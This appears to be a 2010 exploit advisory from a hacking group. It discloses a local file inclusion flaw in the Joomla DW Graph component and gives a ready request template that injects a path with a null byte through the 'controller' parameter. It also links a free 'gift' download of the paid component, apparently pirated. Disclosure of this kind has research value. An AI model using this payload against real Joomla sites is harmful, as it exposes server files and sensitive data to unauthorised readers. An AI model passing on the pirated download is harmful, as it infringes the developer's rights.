--------------------------------------------------------------------------------- Joomla Component DW Graph Local File Inclusion --------------------------------------------------------------------------------- Author : Chip D3 Bi0s Group : LatinHackTeam Email & msn : chipdebios@gmail.com Date : 31 March 2010 Critical Lvl : Moderate Impact : Exposure of sensitive information Where : From Remote --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : DW Graph Component Developer : DecryptWeb License : GPL type : Commercial Price : $5.00 Date Added : 25 March 2010 Download : http://shop.decryptweb.com/extensions/joomla/graph-component.html my gift (free) : http://rapidshare.com/files/370201416/dwgraphs_unzipfirst.zip.html Demo : http://demo.decryptweb.com/joomla/dwgraphs Description : DW Graph Component is a Joomla 1.5 native component for displaying graphs. With this component you can input numerical values with the help of CSV file and can show graphical representation of the input data in the site frontend. Various parameters can be configured for display of graph. --------------------------------------------------------------------------- file error : /components/com_dwgraphs/dwgraphs.php how to exploit http://127.0.0.1/index.php?option=com_dwgraphs&controller={lfi}%00 +++++++++++++++++++++++++++++++++++++++ [!] Produced in South America +++++++++++++++++++++++++++++++++++++++